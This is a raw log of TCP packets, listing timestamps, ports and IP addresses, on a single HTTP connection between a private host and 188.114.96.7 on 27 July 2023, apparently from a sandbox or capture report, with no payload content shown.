Jul 27, 2023 20:18:47.179239988 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179286957 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179327011 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.179333925 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179380894 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179389000 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.179423094 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.179817915 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.205985069 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206053972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206115007 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206165075 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206207037 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206212044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206207037 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206264019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206314087 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206347942 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206392050 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206394911 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206428051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206461906 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206474066 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206480980 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206511974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206559896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206583023 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206607103 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206653118 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206655025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206701040 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206733942 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206748962 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206795931 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206841946 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206845999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206893921 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206948042 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.206995964 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.206995964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207041025 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207043886 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207092047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207140923 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207189083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207189083 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207237959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207283020 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207285881 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207334042 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207381010 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207382917 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207432032 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207479000 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207479954 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207528114 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207575083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207576036 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207624912 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207674980 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207688093 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207724094 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207777977 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207777977 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207824945 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207837105 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207871914 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207911015 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.207920074 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.207962036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208009005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208060026 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208065987 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208108902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208158970 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208163977 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208209038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208228111 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208302975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208353043 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208403111 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208404064 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208451986 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208462954 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208498001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208545923 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208556890 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208595037 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208647966 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208697081 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208724022 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208741903 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208832979 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208834887 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208870888 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208880901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208930016 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.208961964 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.208981991 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209032059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209055901 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209080935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209129095 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209175110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209220886 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209224939 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209265947 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209295034 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209311008 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209356070 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209362030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209409952 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209459066 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209503889 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209508896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209549904 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209556103 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209604025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209646940 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209652901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209700108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209749937 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209758043 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209799051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209835052 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209873915 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209883928 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209932089 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.209933996 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.209981918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210031033 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210069895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210078001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210124016 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210124969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210170984 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210220098 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210258961 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210268021 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210311890 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210315943 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210362911 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210403919 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210411072 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210454941 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210488081 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210501909 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210549116 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210572004 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210597038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210644960 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210690975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210736990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210741043 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210783958 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210823059 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210830927 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210884094 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210922003 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.210931063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210982084 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.210983992 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211030960 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211077929 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211117029 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211124897 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211174011 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211179018 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211220980 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211266994 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211268902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211318016 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211357117 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211364985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211410999 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211412907 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211460114 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211508036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211546898 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211555958 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211602926 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211616993 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211651087 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211698055 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211745024 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211786032 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211791992 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211839914 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211880922 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211889029 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211937904 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.211977005 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.211982965 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212024927 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212032080 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212080956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212121010 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212127924 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212174892 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212223053 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212223053 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212296963 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212347031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212388039 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212394953 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212445974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212488890 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212493896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212536097 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212543011 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212590933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212632895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212641001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212688923 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212713003 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212740898 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212789059 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212837934 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212879896 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.212888956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212938070 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.212954998 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213026047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213071108 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213077068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213124990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213172913 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213172913 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213224888 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213273048 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213277102 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213320971 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213368893 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213411093 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213416100 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213463068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213510036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213527918 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213557959 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213557959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213607073 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213654041 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213680983 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213701010 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213749886 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213752031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213799000 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213846922 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213870049 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213896036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213936090 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213948011 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.213995934 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.213998079 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.214046001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.214066982 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.214096069 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.214128017 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.214184999 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.228257895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.233272076 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.233335972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.233355999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.233385086 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.233563900 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.233563900 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.249799967 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.249856949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.249891043 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.249938965 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.249990940 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.250020027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.250020027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.250039101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.250063896 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.250082016 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.250087023 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.250133991 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.250135899 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.250540972 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.266525030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266593933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266643047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266689062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266733885 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266782045 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266808033 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.266808033 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.266839981 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266886950 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266926050 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.266932964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.266983032 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.267021894 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.267030001 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.267077923 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.267115116 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.267126083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.267173052 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.267210007 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.267219067 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.267266035 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.267302036 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.273986101 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.283674002 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.283735991 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.283786058 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.283843994 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.283893108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.283941031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.283993006 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284043074 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284090996 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284137964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284184933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284234047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284303904 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284351110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284398079 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284430027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284430027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284430027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284430027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284430027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284430027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284444094 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284491062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284529924 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284542084 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284588099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284632921 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:47.284638882 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:47.284682035 CEST	80	49683	188.114.96.7	192.168.2.4
